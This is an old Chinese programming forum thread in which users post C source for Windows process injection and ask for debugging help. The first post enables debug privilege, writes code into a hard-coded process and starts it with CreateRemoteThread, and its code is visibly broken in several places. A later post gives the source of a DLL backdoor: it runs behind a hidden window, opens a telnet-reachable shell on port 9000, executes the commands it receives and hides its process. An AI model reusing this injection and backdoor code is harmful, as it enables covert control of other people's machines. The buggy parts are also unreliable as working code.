求助远线程问题!!!!
#include <windows.h>
#include #include <stdio.h> typedef HINSTANCE (__stdcall *PLoadLibraryW)(LPCTSTR); typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (__stdcall *PFreeLibFunc)( HINSTANCE ); typedef ATOM (__stdcall *PRegisterClass) (CONST WNDCLASS); typedef HWND (__stdcall *PCreateWindow) (LPCTSTR,LPCTSTR,DWORD,int,int,int,int, HWND,HMENU,HANDLE,LPVOID); typedef BOOL (__stdcall *PShowWindow) (HWND,int); typedef BOOL (__stdcall *PUpdateWindow) (HWND); typedef BOOL (__stdcall *PGetMessage) (LPMSG,HWND,UINT,UINT); typedef BOOL (__stdcall *PTranslateMessage) (CONST MSG); typedef LONG (__stdcall *PDispatchMessage) (CONST MSG); typedef LRESULT (__stdcall *PDefWindowProc) (HWND,UINT,WPARAM,LPARAM); //--------------------------------------------------------------------------- #include <windows.h> #include #include <stdio.h> #pragma hdrstop //--------------------------------------------------------------------------- #pragma argsused typedef HINSTANCE (__stdcall *PLoadLibraryW)(LPCTSTR); typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (__stdcall *PFreeLibFunc)( HINSTANCE ); typedef ATOM (__stdcall *PRegisterClass) (CONST WNDCLASS); typedef HWND (__stdcall *PCreateWindow) (LPCTSTR,LPCTSTR,DWORD,int,int,int,int, HWND,HMENU,HANDLE,LPVOID); typedef BOOL (__stdcall *PShowWindow) (HWND,int); typedef BOOL (__stdcall *PUpdateWindow) (HWND); typedef BOOL (__stdcall *PGetMessage) (LPMSG,HWND,UINT,UINT); typedef BOOL (__stdcall *PTranslateMessage) (CONST MSG); typedef LONG (__stdcall *PDispatchMessage) (CONST MSG); typedef LRESULT (__stdcall *PDefWindowProc) (HWND,UINT,WPARAM,LPARAM); typedef struct RT_Tag { POINT point; MSG msg; WNDCLASS wndclass; PLoadLibraryW fnLoadLibrary; PGetProcAddress fnGetProcAddress; PFreeLibFunc fnFreeLibrary; //***********WNDCLASS结构**************** char szclassname[32]; char title[32]; char windowsstyle[32]; char x[32]; char y[32]; char width[32]; char height[32]; char wndparent[32]; char menu[32]; char 
instance[32]; char param[32]; //***********将要用到的函数**************** char use32[32]; char registerclass[32]; char createwindow[32]; char showwindows[32]; char updatewindow[32]; char getmessage[32]; char translatemessage[32]; char dispatchmessage[32]; } RT; typedef struct WinProc { PLoadLibraryW fnLoadLibrary; PGetProcAddress fnGetProcAddress; PFreeLibFunc fnFreeLibrary; char use32[32]; char defwindowproc[32]; } WP; //--------------------------------------------------------------------------------------- LRESULT CALLBACK WndProc(HWND hwnd,UINT message,WPARAM wParam,LPARAM lParam); int TestClass(RT *p) { HINSTANCE hInstance;HINSTANCE hPrevInstance;LPSTR lpCmdLine;int nShowCmd; HWND hwnd; RT *Run=p; PRegisterClass fnRegisterClass; PCreateWindow fnCreateWindow; PShowWindow fnShowWindow; PUpdateWindow fnUpdateWindow; PGetMessage fnGetMessage; PTranslateMessage fnTranslateMessage; PDispatchMessage fnDispatchMessage; HMODULE huse32=Run->fnLoadLibrary(Run->use32); fnRegisterClass=(PRegisterClass)Run->fnGetProcAddress(huse32,Run->registerclass); fnCreateWindow=(PCreateWindow)Run->fnGetProcAddress(huse32,Run->createwindow); fnShowWindow=(PShowWindow)Run->fnGetProcAddress(huse32,Run->showwindows); fnUpdateWindow=(PUpdateWindow)Run->fnGetProcAddress(huse32,Run->updatewindow); fnGetMessage=(PGetMessage)Run->fnGetProcAddress(huse32,Run->getmessage); fnTranslateMessage=(PTranslateMessage)Run->fnGetProcAddress(huse32,Run->translatemessage); fnDispatchMessage=(PDispatchMessage)Run->fnGetProcAddress(huse32,Run->dispatchmessage); //执行部分 fnRegisterClass(Run->wndclass); hwnd=fnCreateWindow(Run->szclassname,Run->title,(DWORD)Run->windowsstyle, (int)Run->x,(int)Run->y,(int)Run->width,(int)Run->height, Run->wndparent,Run->menu,Run->instance,Run->param); fnShowWindow(hwnd,nShowCmd); fnUpdateWindow(hwnd); while(fnGetMessage(&(Run->msg),NULL,0,0)) { fnTranslateMessage(Run->msg); fnDispatchMessage(Run->msg); } return (Run->msg).wParam; } 
//-------------------------------------------------------------------------------------------- BOOL EnableDebugPrivilege() { HANDLE hToken; BOOL fOk=FALSE; if(OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)) { TOKEN_PRIVILEGES tp; tp.PrivilegeCount=1; if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid)) printf(\"Can‘t lookup privilege value.\\n\"); tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; if(!AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL)) printf(\"Can‘t adjust privilege value.\\n\"); fOk=(GetLastError()==ERROR_SUCCESS); CloseHandle(hToken); } return fOk; } //--------------------------------------------------------------------------------------------- LRESULT CALLBACK WndProc(HWND hwnd,UINT message,WPARAM wParam,LPARAM lParam) { PDefWindowProc fnDefWindowProc; WP *Run; HMODULE huse32=Run->fnLoadLibrary(Run->use32); fnDefWindowProc=(PDefWindowProc)Run->fnGetProcAddress(huse32,Run->defwindowproc); return fnDefWindowProc(hwnd,message,wParam,lParam); } //--------------------------------------------------------------------------------------------- int main(int argc, char* argv[]) { HANDLE hRemoteProcess; void *pStart,*pcallback; void *pParam,*pcallbackParam; RT RunParam; WP RunCallBack; int iReturnCode,icallbackcode; int cb=(int)EnableDebugPrivilege-(int)TestClass+1024; if(!EnableDebugPrivilege()) printf(\"Can‘t adjust token.\\n\"); hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD| //允许远程创建线程 PROCESS_VM_OPERATION| //允许远程VM操作 PROCESS_VM_WRITE, //允许远程VM写 FALSE, 2222); if(!hRemoteProcess) { printf(\"Can‘t open the process.\\n\"); return 0; } //Write function itself//写入函数体 pStart = VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_EXECUTE_READWRITE); pcallback = VirtualAllocEx( hRemoteProcess, NULL, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if(!pStart||!pcallback) { printf(\"Can‘t alloc remote memory for function itself.\\n\"); CloseHandle(hRemoteProcess); return 0; } iReturnCode = 
WriteProcessMemory(hRemoteProcess, pStart, &TestClass/*函数体*/, cb, NULL); icallbackcode = WriteProcessMemory(hRemoteProcess, pcallback, &WndProc/*函数体*/, 4096, NULL); if(!iReturnCode) { printf(\"Can‘t write process memory for function itself.\\n\"); CloseHandle(hRemoteProcess); return 0; } //Set function params//设定函数参数 HMODULE hKernel32 = LoadLibrary( \"kernel32.dll\" ); RunParam.fnLoadLibrary = (PLoadLibraryW)GetProcAddress (hKernel32, \"LoadLibraryA\"); RunParam.fnGetProcAddress = (PGetProcAddress)GetProcAddress (hKernel32, \"GetProcAddress\"); RunParam.fnFreeLibrary = (PFreeLibFunc)GetProcAddress( hKernel32, \"FreeLibrary\" ); //**************************************************************// RunCallBack.fnLoadLibrary = (PLoadLibraryW)GetProcAddress (hKernel32, \"LoadLibraryA\"); RunCallBack.fnGetProcAddress = (PGetProcAddress)GetProcAddress (hKernel32, \"GetProcAddress\"); RunCallBack.fnFreeLibrary = (PFreeLibFunc)GetProcAddress( hKernel32, \"FreeLibrary\" ); strcpy(RunCallBack.use32,\"user32.dll\"); strcpy(RunCallBack.defwindowproc,\"DefWindowProc\"); //**************************************************************// strcpy(RunParam.use32,\"user32.dll\"); strcpy(RunParam.registerclass,\"RegisterClass\"); strcpy(RunParam.createwindow,\"CreateWindow\"); strcpy(RunParam.showwindows,\"ShowWindow\"); strcpy(RunParam.updatewindow,\"UpdateWindow\"); strcpy(RunParam.getmessage,\"GetMessage\"); strcpy(RunParam.translatemessage,\"TranslateMessage\"); strcpy(RunParam.dispatchmessage,\"DispatchMessage\"); //------------WNDCLASS结构初始化-------------// RunParam.wndclass.style=CS_HREDRAW | CS_VREDRAW; RunParam.wndclass.lpfnWndProc=pcallback; //这里书上说要指向窗口过程处理函数的地址,我不知该怎样写!!! RunParam.wndclass.cbClsExtra=0; RunParam.wndclass.cbWndExtra=0; RunParam.wndclass.hInstance=hInstance;//实例句柄,我不知该如何确定!!! 
RunParam.wndclass.hIcon=LoadIcon(NULL,IDI_APPLICATION); RunParam.wndclass.hCursor=LoadCursor(NULL,IDC_ARROW); RunParam.wndclass.hbrBackground=(HBRUSH)GetStockObject(WHITE_BRUSH); RunParam.wndclass.lpszMenuName=NULL; RunParam.wndclass.lpszClassName=RunParam.szclassname; //------------CreateWindow初始化-------------// strcpy(RunParam.szclassname,\"HelloWinClass\"); strcpy(RunParam.title,\"The HelloWin program\"); strcpy(RunParam.windowsstyle,\"WS_OVERLAPPEDWINDOW\"); strcpy(RunParam.x,\"CW_USEDEFAULT\"); strcpy(RunParam.y,\"CW_USEDEFAULT\"); strcpy(RunParam.width,\"CW_USEDEFAULT\"); strcpy(RunParam.height,\"CW_USEDEFAULT\"); strcpy(RunParam.wndparent,\"NULL\"); strcpy(RunParam.menu,\"NULL\"); strcpy(RunParam.instance,\"hInstance\"); strcpy(RunParam.param,\"NULL\"); //Write function params//写入函数参数 pParam = VirtualAllocEx( hRemoteProcess, NULL, sizeof(RT), MEM_COMMIT, PAGE_EXECUTE_READWRITE); pcallbackParam = VirtualAllocEx( hRemoteProcess, NULL, sizeof(WP), MEM_COMMIT, PAGE_EXECUTE_READWRITE); if(!pParam) { printf(\"Can‘t alloc remote memory for function params.\\n\"); CloseHandle(hRemoteProcess); return 0; } iReturnCode = WriteProcessMemory(hRemoteProcess, pParam, &RunParam, /*此处为RT结构*/ sizeof(RT), NULL); icallbackcode = WriteProcessMemory(hRemoteProcess, pParam, &RunCallBack, sizeof(RT),NULL); if(!iReturnCode||!icallbackcode) { printf(\"Can‘t write process memory for function param.\\n\"); CloseHandle(hRemoteProcess); return 0; } HANDLE hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, (PTHREAD_START_ROUTINE)pStart,//写入函数体时分配的地址 pParam,//函数参数地址 0, NULL); HANDLE hCallBackThread=CreateRemoteThread( hRemoteProcess, NULL, 0, (PTHREAD_START_ROUTINE)pcallback,//写入函数体时分配的地址 pcallbackParam,//函数参数地址 0, NULL); if(!hRemoteThread||!hCallBackThread) { printf(\"Can‘t create remote thread.\\n\"); CloseHandle(hRemoteProcess); return 0; } FreeLibrary(hKernel32); CloseHandle(hRemoteProcess); CloseHandle(hRemoteThread); printf(\"Inject success!\\n\"); return 0; } 
//------------------------------------------------------------------------ 这段是我写的在远线程中建立窗口的代码,我有几点不明白 1,WNDCLASS结构中的lpfnWndProc参数书上说要指向窗口过程处理函数的地址,但在远线程中我不知该怎样写 2,WNDCLASS结构中的hInstance参数,是一个实例句柄,该如何确定??? 3,窗口处理函数LRESULT CALLBACK WndProc似乎不能这么写,请问该怎么写????? 4,我的WP *Run已经赋了值了!!在这里------ WP RunCallBack; RunCallBack.fnLoadLibrary = (PLoadLibraryW)GetProcAddress (hKernel32, \"LoadLibraryA\"); RunCallBack.fnGetProcAddress = (PGetProcAddress)GetProcAddress (hKernel32, \"GetProcAddress\"); RunCallBack.fnFreeLibrary = (PFreeLibFunc)GetProcAddress( hKernel32, \"FreeLibrary\" ); strcpy(RunCallBack.use32,\"user32.dll\"); strcpy(RunCallBack.defwindowproc,\"DefWindowProc\"); 不过我一直没办法把值传进去!!!(众人狂倒ing~~~~~~~~) 应该是像TestClass里一样把WndProc 写成WndProc(WP *p)然后再在里面用WP *RUN=p;这就可以完成了, 不过不能这么写!!! 郁闷!!!! 请问该怎么写?????? |
发布于:2003-01-19 22:48
创建REMOTE THREAD本身会将你的DLL LOAD到目标进程中. 而REMOTE THREAD的启动地址是你传入的参数地址. 如果你的DLL没有LOAD到预定的位置, 那就无法正常工作. 我的做法是自己的DLL一定要选择一个比较生僻的BASE ADDRESS. 然后当KERNEL32将你的DLL加载到TARGET PROCESS时,才不会出错. 至于其他东西, 照常写就可以.
发布于:2003-01-22 21:52
我写了一个网络通讯的服务器端程序, 我先把它写成了一个EXE, 并且测试通过, 现在我把它在EXE的基础上改写为DLL, 问题来了, 我用rundll32命令运行了其中的WinMain函数, 结果是我预定义的端口9000是开放了,
(我用扫瞄器扫过,而且Telnet也可以连上),不过不处理命令,我是用Telnet连上的,用Telnet 127.0.0.1 9000连上后DOS窗口一片黑,无任何显示,而在我用此代码的EXE版测试时,一连上就有我自定义的QUEEN Ver 1.0 Write by NOIR 提示符(前面已说过EXE测试通过),而且无论我在键盘上敲什么,DOS窗口就是定在那,什么反应都没有,请帮我看看示那个地方不对, 这里给出我程序的主要部分,前面都是一些处理操作的函数,太长就不贴出了, //--------------------------------------------------------------------------- // InitSocket // 初始化SOCKET //-------------------------------------------------------------------------- extern \"C\" __declspec(dllexport) BOOL WINAPI InitSocket(HWND hWnd) { if((WSAStartup(dwVersion,&wsaData))!=0) { MessageBox(hWnd,\"INIT SOCKET ERROR\",NULL,MB_OK); return FALSE; } CreateSock=socket(AF_INET,SOCK_STREAM,0);//用来创建一个套接字,成功返回新套接字的描述字 if(CreateSock==SOCKET_ERROR) { closesocket(CreateSock); MessageBox(hWnd,\"SOCKET ERROR\",NULL,MB_OK); return FALSE; } Sock_in.sin_family=AF_INET; Sock_in.sin_port=htons(PORT); Sock_in.sin_addr.S_un.S_addr=htonl(INADDR_ANY); setsockopt(CreateSock,SOL_SOCKET,SO_REUSEADDR,(LPSTR)&dwFlag,sizeof(dwFlag)); if(bind(CreateSock,(LPSOCKADDR)&Sock_in,sizeof(Sock_in))==SOCKET_ERROR) { closesocket(CreateSock); MessageBox(hWnd,\"BIND ERROR\",NULL,MB_OK); return FALSE; } else if(listen(CreateSock,3)==SOCKET_ERROR) { closesocket(CreateSock); MessageBox(hWnd,\"LISTEN ERROR\",NULL,MB_OK); return FALSE; } else if(WSAAsyncSelect(CreateSock,hWnd,WM_SOCKET,FD_ACCEPT|FD_CLOSE)==SOCKET_ERROR)//008.pdf->p8 { closesocket(CreateSock); MessageBox(hWnd,\"WSASelect ERROR\",NULL,MB_OK); return FALSE; } addrlen=sizeof(SOCKADDR_IN); return TRUE; } //--------------------------------------------------------------------------- extern \"C\" __declspec(dllexport) LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam) { static TCHAR szCommand[dwComm]; static TCHAR szExec[dwComm]; switch(message) { case WM_SOCKET: if(WSAGETSELECTERROR(lParam)) { closesocket(wParam); break; } switch(WSAGETSELECTEVENT(lParam)) { //连接 case FD_ACCEPT: NewSock=accept(CreateSock,(LPSOCKADDR)&NewSock_in,&addrlen); 
WSAAsyncSelect(NewSock,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE); wsprintf(szCommand,\"QUEEN Ver 1.0 Write by NOIR\\n\\n\\r%s\",PROMPT); send(NewSock,szCommand,dwComm,0); break; //读取输入,如是回车则执行命令 //不是将输入复制到缓冲区 case FD_READ: ZeroMemory(szCommand,dwComm); recv(NewSock,szCommand,dwComm,0); if(szCommand[0]==VK_RETURN) { wsprintf(szCommand,\"\\n\\n\\r%s\",PROMPT); send(NewSock,szCommand,dwComm,0); ExeCommand(szExec,hWnd); ZeroMemory(szExec,dwComm); } else lstrcat(szExec,szCommand); send(NewSock,szCommand,dwComm,0); break; case FD_CLOSE: closesocket(wParam); break; } break; case WM_DESTROY: HideProc(UNSERVICE_PROC); PostQuitMessage(0); break; default: return DefWindowProc(hWnd,message,wParam,lParam); } return 0; } //--------------------------------------------------------------------------- extern \"C\" __declspec(dllexport) WINAPI WinMain(HINSTANCE , HINSTANCE, LPSTR, int) { HWND hWnd; MSG msg; WNDCLASS wndc; LPSTR szAppName=\"LANLAN\"; HKEY hKey=0; DWORD disp=0; LONG lResult; TCHAR szKey[MAX_PATH]; TCHAR szSysDir[MAX_PATH+25]; TCHAR szFileName[MAX_PATH]; wndc.style=0; wndc.lpfnWndProc=WndProc; wndc.cbClsExtra=0; wndc.cbWndExtra=0; wndc.hInstance=NULL; wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION); wndc.hCursor=LoadCursor(NULL,IDC_ARROW); wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1); wndc.lpszMenuName=NULL; wndc.lpszClassName=szAppName; RegisterClass(&wndc); hWnd=CreateWindow(szAppName,\"LANLANServer\", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT,CW_USEDEFAULT, CW_USEDEFAULT,CW_USEDEFAULT, NULL,NULL,NULL,NULL); ShowWindow(hWnd,SW_HIDE); UpdateWindow(hWnd); InitSocket(hWnd); while(GetMessage(&msg,NULL,0,0)) { TranslateMessage(&msg); DispatchMessage(&msg); } return (msg.wParam); } //---------------------------------------------------------------------------------------------- int WINAPI DllEntryPoint(HINSTANCE hinst, unsigned long reason, void* lpReserved) { LPSTR lpCmdLine=GetCommandLine(); if(reason==DLL_PROCESS_ATTACH) WinMain(hinst,//当前的实例句柄 NULL,//总为NULL 
lpCmdLine,//命令行参数,由GetCommandLine()得到 SW_SHOW);//窗口显示方式 return 1; } //--------------------------------------------------------------------------- |